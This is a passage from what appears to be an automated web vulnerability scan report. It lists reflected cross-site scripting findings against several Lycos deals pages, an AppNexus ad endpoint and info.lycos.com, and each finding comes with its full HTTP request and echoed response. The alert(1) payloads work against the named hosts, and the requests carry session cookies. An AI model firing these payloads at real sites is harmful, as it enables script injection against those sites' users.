The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1636"style%3d"x%3aexpression(alert(1))"804d8716915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1636"style="x:expression(alert(1))"804d8716915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/sports-and-fitness-211?b1636"style%3d"x%3aexpression(alert(1))"804d8716915=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b1636"style="x:expression(alert(1))"804d8716915=1">
...[SNIP]...

1.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25137"style%3d"x%3aexpression(alert(1))"bca27b4183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25137"style="x:expression(alert(1))"bca27b4183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/televisions-159?25137"style%3d"x%3aexpression(alert(1))"bca27b4183=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;25137"style="x:expression(alert(1))"bca27b4183=1">
...[SNIP]...

1.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23e36"style="x:expression(alert(1))"b5dbc63acb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/travel-and-entertainment-206?23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;23e36"style="x:expression(alert(1))"b5dbc63acb4=1">
...[SNIP]...

1.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9585"style="x:expression(alert(1))"08d8944c63d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/best-buy-560?d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;d9585"style="x:expression(alert(1))"08d8944c63d=1">
...[SNIP]...

1.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e75fd"style="x:expression(alert(1))"3e066d15b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/buy-com-233?e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e75fd"style="x:expression(alert(1))"3e066d15b13=1">
...[SNIP]...

1.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61e95"style="x:expression(alert(1))"a787e8b7cfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/dell-home-638?61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;61e95"style="x:expression(alert(1))"a787e8b7cfe=1">
...[SNIP]...

1.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf14a"style="x:expression(alert(1))"366512bb10b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/ebay-50?bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;bf14a"style="x:expression(alert(1))"366512bb10b=1">
...[SNIP]...

1.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c84"style%3d"x%3aexpression(alert(1))"9dccb822702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13c84"style="x:expression(alert(1))"9dccb822702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/itunes-music-store-1414?13c84"style%3d"x%3aexpression(alert(1))"9dccb822702=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;13c84"style="x:expression(alert(1))"9dccb822702=1">
...[SNIP]...

1.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0561"style="x:expression(alert(1))"97f7932e4ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/walmart-321?a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;a0561"style="x:expression(alert(1))"97f7932e4ff=1">
...[SNIP]...

1.51. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a5a5'%3balert(1)//7777e16fd16 was submitted in the redir parameter. This input was echoed as 4a5a5';alert(1)//7777e16fd16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.idg_b2c&size=728x90&referrer=http%3A%2F%2Fshopping.lycos.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-6268295_1292163909%2C%2Cshop%2C%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D980870%3Bcontx%3Dshop%3Ban%3D{PRICEBUCKET}%3Bdc%3Dd%3Bbtg%3D%3Bord%3D5266572%3F4a5a5'%3balert(1)//7777e16fd16 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://shopping.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=1253520181866309356; icu=EAAYAA..; acb244106=5_[r^kI/7ZI!97E0nf8MG#ngg?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgP4AtEUe-YV1k7KbsxvZlZREt2wRNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADrHzp9&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292163885%29%3Buf%28%27r%27%2C+114384%2C+1292163885%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2811%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2887%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28619%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28620%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28621%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; sess=1; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTSHJTy]F]k($WNwJP'.<5sLEKRldcpNp)Ec(kJ6st'z3Uv2?!F?0<:.kuRsX$mCQui>4M`J`y*aOn9LJHv?jDa''Df?dw]@K3NPeORWrK5v*s0045+'v.Jg1BCTjbtb.(7Yo>`<xZkofNI5StD5bqM=kN.BbMwKNO7wJ?G+_W?^@>wr?4/0viQZwz3N4Erbd<u$`O`Fg>TW*rP!?5iWVO-@k

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb244106=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Sat, 12-Mar-2011 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb7262=5_[r^kI/7ZI!97E0nf8M>yz4N?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgPwols7zZIRBB7KbsxvZlZREU3ARNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADXH3V5&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292164116%29%3Buf%28%27r%27%2C+114384%2C+1292164116%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2811%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2887%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28619%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28620%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28621%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 12 Dec 2010 14:28:36 GMT
Content-Length: 365

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.idg_b2c/;net=cm;u=,cm-6268295_1292163909,,shop,;;cmw=owl;sz=728x90;net=cm;ord1=980870;contx=shop;an=40;dc=d;btg=;ord=5266572?4a5a5';alert(1)//7777e16fd16">
...[SNIP]...

1.52. http://info.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c59d"><script>alert(1)</script>b1e138b458a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images9c59d"><script>alert(1)</script>b1e138b458a HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
